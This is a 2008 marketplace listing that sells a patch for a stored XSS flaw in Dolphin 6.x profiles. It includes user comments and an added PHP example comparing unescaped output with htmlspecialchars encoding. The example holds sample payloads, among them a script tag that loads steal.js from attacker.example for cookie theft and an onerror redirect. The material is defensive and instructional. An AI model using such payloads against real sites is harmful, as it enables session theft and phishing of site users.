Fix XSS vulnerability
Product Details
Posted by:
Version: 1.0.0000
Tags: dolphin fix site XSS cross scripting vulnerability
Compatible for: Dolphin v.6.x, Dolphin v.6.0
License: GNU General Public License (GPL)
Price: $5
Created: April 22, 2008 at 07:58
Avg. vote: 9.07
Product Description
Hello and welcome!

I have found an XSS (cross-site scripting) vulnerability in Dolphin (all versions 6.0.000X and 6.1 Beta) that allows a registered user to execute a script on anyone who views his/her profile. The malicious user could use it to:

1. Steal the "cookie" of the person viewing his profile, including other users AND the admin!

2. Automatically redirect anyone viewing his profile to another website.

3. Pop up a fake login box and record the information entered.

The possibilities are endless, because he would actually be running the script from ANOTHER server!

I notified "VictorT" and "Unoboonex" as soon as I found the flaw, but most of us have sites that are so heavily modded that we will be unable to upgrade to the next version after this vulnerability is fixed, so I put this out.

This was JUST discovered and has not hit any of the hacker forums yet. Patch NOW!

*** If you are using the FINAL version of 6.1 you DON'T need this. If you are using the beta versions or ANY 6.0.000X versions, you are vulnerable! ***

thanks
M.scott
http://www.makeasocialnetwork.com (Patched :-)
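The flaw described above is a stored XSS: text a registered user saves in a profile field is echoed into the profile page without encoding, so the browser of every viewer (members and admin alike) runs whatever markup it contains. The mod's own patch is not reproduced on this page. What follows is an added example, not code from the mod or from Dolphin, showing the vulnerable rendering pattern beside the standard fix (HTML-encoding on output with htmlspecialchars) and the HttpOnly cookie flag as defence in depth against the cookie-theft case. The field (the profile description), the function names and the three payloads are constructed for illustration; they are not taken from the actual exploit.

```php
<?php
// Added example, not code from the Expertzzz mod or from Dolphin itself.
// Field name, function names and the payloads below are constructed.

// Constructed attacker-controlled profile text, as a registered user might
// save it in a free-text field (assumed here to be the description).
// One payload per abuse listed in the product description above.
$payloads = array(
    'cookie theft' => '<script src="http://attacker.example/steal.js"></script>',
    'redirect'     => '<img src="x" onerror="location=\'http://attacker.example/\'">',
    'fake login'   => '<div onmouseover="showFakeLogin()">Click to see my photos</div>',
);

// Vulnerable pattern: the stored value is concatenated straight into the HTML.
// The viewer's browser parses the tags and runs the attacker's script, which
// is loaded from the attacker's own server.
function render_profile_unsafe($description)
{
    return '<div class="profile-desc">' . $description . '</div>';
}

// Fix: encode on output for the HTML context. ENT_QUOTES encodes both ' and "
// so the same helper is also safe inside attribute values; the explicit
// charset stops malformed multibyte sequences from slipping a '<' past the
// encoder.
function escape_html($value)
{
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

function render_profile_safe($description)
{
    return '<div class="profile-desc">' . escape_html($description) . '</div>';
}

// Defence in depth against abuse 1: with HttpOnly set, document.cookie in the
// viewer's browser does not expose the session cookie, so even a script that
// does get injected cannot read it. Must run before session_start().
ini_set('session.cookie_httponly', '1');

foreach ($payloads as $name => $text) {
    echo "== $name ==\n";
    echo "unsafe: " . render_profile_unsafe($text) . "\n";
    echo "safe:   " . render_profile_safe($text) . "\n\n";
}
// In every "safe" line the attacker's text comes out as &lt; &gt; &quot; and
// similar entities, so the browser displays it as literal text instead of
// parsing it as markup.
```

Save it as a file and run it with the PHP command-line interpreter to compare the two renderings. The rule it demonstrates applies to every template that prints user-supplied text, not just the description: encode at the point of output, for the context you are writing into, rather than relying on stripping tags at registration time, which does nothing for data already in the database.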
Comments
Member (Points: 0), vote 10, posted April 22, 2008:
I've recently had people trying to sign up using code in their description, but because profiles don't go active until the email has been confirmed, I've been blocking the IP address and deleting the profiles. This patch just plays safe for myself and my genuine members.

Member (Points: 10), vote 10, posted April 22, 2008:
Ohhh, you're my new sweet tart for today! Keep this stuff coming!!

Member (Points: 0), vote 10, posted April 22, 2008:
Security is a big concern of mine. I am glad this is available. Thanks!!

Contributor since 24.01.08 (Points: 0), vote 10, posted April 23, 2008:
I know I liked you for a REASON!!!

Keep it up

ExpertzzzPro

Member (Points: 0), vote 10, posted April 24, 2008:
Well spotted, and good fix, thanks

Member (Points: 32), vote 10, posted April 25, 2008:
As ALWAYS, mscott comes through! I SWEAR by this man for MY site.

Member (Points: 0), vote 10, posted May 11, 2008:
Not being a programmer myself, I don't really understand this issue, BUT I trust Mike and I'm glad he's taken the time to find and solve these kinds of problems.

Thanks again !!!

Member (Points: 0), vote 8, posted May 17, 2008:
Installed without a problem, great fix - thanks

Member (Points: 0), vote 10, posted May 21, 2008:
Thanks, buddy, for this fix... I'm not an expert in PHP, but as I read the description of this fix, this can be very serious, and if you post this here, every hacker that knows the Dolphin system will know all the vulnerabilities of the community.

Contributor since 17.04.08 (Points: 0), vote 10, posted May 22, 2008:
A few minutes to install. Thanks

Contributor since 08.05.08 (Points: 0), vote 8, posted June 07, 2008:
This is a great mod. It was installed with no problem and we received excellent customer service from mscott. Keep up the good work.

Member (Points: 14), vote 10, posted August 02, 2008:
Thanks for this

Member (Points: 0), vote 10, posted July 15, 2009:
Thank you for this mod.

I can be sure I am safe now.

Member (Points: 142), vote 1, posted July 29, 2009:
Well, it's been more than 15 days since I tried contacting this guy. My site is fully modded, so that might be the reason I didn't find the code to replace with his in the file. But he isn't responding. Very bad.
